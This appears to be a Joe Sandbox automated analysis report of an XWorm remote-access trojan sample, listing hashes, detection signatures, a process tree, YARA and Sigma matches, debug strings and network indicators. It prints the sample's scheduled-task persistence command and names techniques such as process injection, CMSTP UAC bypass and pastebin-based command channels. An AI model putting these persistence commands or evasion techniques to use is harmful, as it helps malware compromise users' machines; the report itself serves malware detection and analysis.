Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
r8k29DBraE.exe

Overview

General Information

Sample name:r8k29DBraE.exe
renamed because original name is a hash value
Original sample name:03c95970bb3d91530aa29f9199ac1b2d7082672909e9c1a30804f99ebc9643b7.exe
Analysis ID:1533949
MD5:dc50baff9f1bab10f1ebc24e0d77afc3
SHA1:29f4429939e57666b8a57c2d7b95a4801fa7ca20
SHA256:03c95970bb3d91530aa29f9199ac1b2d7082672909e9c1a30804f99ebc9643b7
Tags:exerentry-couser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected UAC Bypass using CMSTP
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates files in the system32 config directory
Found direct / indirect Syscall (likely to bypass EDR)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • r8k29DBraE.exe (PID: 1408 cmdline: "C:\Users\user\Desktop\r8k29DBraE.exe" MD5: DC50BAFF9F1BAB10F1EBC24E0D77AFC3)
    • wzcsapi.exe (PID: 6880 cmdline: "C:\Users\user\Desktop\wzcsapi.exe" MD5: 64FFE7C0FA6AC22F5ACAFD3CEB4ACA5B)
      • schtasks.exe (PID: 7308 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcsapi" /tr "%Current%\wzcsapi.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wzcsvc.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\wzcsvc.exe" MD5: A69C6E092D415063A9FB80F8FE4E3444)
      • svchost.exe (PID: 6108 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • WerFault.exe (PID: 6208 cmdline: C:\Windows\system32\WerFault.exe -pss -s 432 -p 1408 -ip 1408 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
        • svchost.exe (PID: 7240 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 2524 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 912 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 356 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 704 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 932 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1188 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1212 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1376 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1388 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 7640 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1400 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1520 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1636 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1668 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1752 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1760 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1804 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1852 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1952 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1976 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1992 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7180 cmdline: C:\Windows\system32\WerFault.exe -u -p 1408 -s 1088 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1595934770.000002611005F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    00000001.00000002.1598581961.000002616E806000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x661c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x66b9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x67ce:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x648c:$cnc4: POST / HTTP/1.1
          Click to see the 4 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.wzcsapi.exe.28cf290.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
            3.2.wzcsapi.exe.28cf290.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x481c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x48b9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x49ce:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x468c:$cnc4: POST / HTTP/1.1
            3.2.wzcsapi.exe.1bee0000.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
              3.2.wzcsapi.exe.1bee0000.2.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x481c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x48b9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x49ce:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x468c:$cnc4: POST / HTTP/1.1
              1.2.r8k29DBraE.exe.2616e7b0000.10.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                Click to see the 6 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\wzcsvc.exe" , ParentImage: C:\Users\user\Desktop\wzcsvc.exe, ParentProcessId: 5480, ParentProcessName: wzcsvc.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6108, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\wzcsvc.exe" , ParentImage: C:\Users\user\Desktop\wzcsvc.exe, ParentProcessId: 5480, ParentProcessName: wzcsvc.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6108, ProcessName: svchost.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: r8k29DBraE.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\Desktop\wzcsapi.exeAvira: detection malicious, Label: TR/Dropper.Gen
                Source: C:\Users\user\Desktop\wzcsvc.exeAvira: detection malicious, Label: HEUR/AGEN.1362795
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\Desktop\wzcsapi.exeReversingLabs: Detection: 83%
                Source: C:\Users\user\Desktop\wzcsvc.exeReversingLabs: Detection: 87%
                Multi AV Scanner detection for submitted file
                Source: r8k29DBraE.exeReversingLabs: Detection: 66%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\Desktop\wzcsapi.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\wzcsvc.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: r8k29DBraE.exeJoe Sandbox ML: detected

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 1.2.r8k29DBraE.exe.2616e7b0000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1595934770.000002611005F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1598581961.000002616E806000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: r8k29DBraE.exe PID: 1408, type: MEMORYSTR
                Source: unknownHTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.7:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.7:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52493 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52495 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52497 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52500 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52504 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52509 version: TLS 1.2
                Source: r8k29DBraE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Xml.ni.pdbP source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERE551.tmp.dmp.8.dr
                Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000015.00000000.1433048266.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2634750925.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERE551.tmp.dmp.8.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000015.00000000.1433048266.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2634750925.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb$ source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
                Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdb\2 source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: gs.pdb'E source: WerFault.exe, 00000008.00000002.1585866335.00000265B1A0B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Configuration.ni.pdbD source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: gs.pdb source: WerFault.exe, 00000008.00000002.1585866335.00000265B1A0B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.pdbHt' source: WERE551.tmp.dmp.8.dr
                Source: Binary string: mscorlib.ni.pdbLe: source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.pdb@ source: WERE551.tmp.dmp.8.dr
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.pdbMZ source: WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000015.00000002.2635721710.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434010255.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdb$g source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000015.00000002.2636546216.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.1434101282.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdb source: WerFault.exe, 00000008.00000002.1587126223.00000265B3F90000.00000004.00000001.00020000.00000000.sdmp, WERE551.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERE551.tmp.dmp.8.dr
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F59E250 FindFirstFileExW,1_2_000002616F59E250
                Source: C:\Windows\System32\svchost.exeCode function: 5_2_00000216819BE250 FindFirstFileExW,5_2_00000216819BE250
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1EE250 FindFirstFileExW,6_2_000001CA7D1EE250
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C0E250 FindFirstFileExW,8_2_00000265B3C0E250
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD5E250 FindFirstFileExW,9_2_0000017D2DD5E250
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B92E250 FindFirstFileExW,10_2_0000022F4B92E250
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE272E250 FindFirstFileExW,11_2_0000013DE272E250
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CAE250 FindFirstFileExW,14_2_00000262F1CAE250
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E15E250 FindFirstFileExW,15_2_000002234E15E250
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000023942B1E250 FindFirstFileExW,16_2_0000023942B1E250
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_000001EF056DE250 FindFirstFileExW,17_2_000001EF056DE250
                Source: C:\Windows\System32\svchost.exeCode function: 18_2_000002287AD7E250 FindFirstFileExW,18_2_000002287AD7E250
                Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001B94DA9E250 FindFirstFileExW,19_2_000001B94DA9E250
                Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002520257E250 FindFirstFileExW,20_2_000002520257E250
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001A9EBFCE250 FindFirstFileExW,21_2_000001A9EBFCE250
                Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000019FF163E250 FindFirstFileExW,22_2_0000019FF163E250

                Networking

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System32\svchost.exeDomain query: i.ibb.co
                Connects to a pastebin service (likely for C&C)
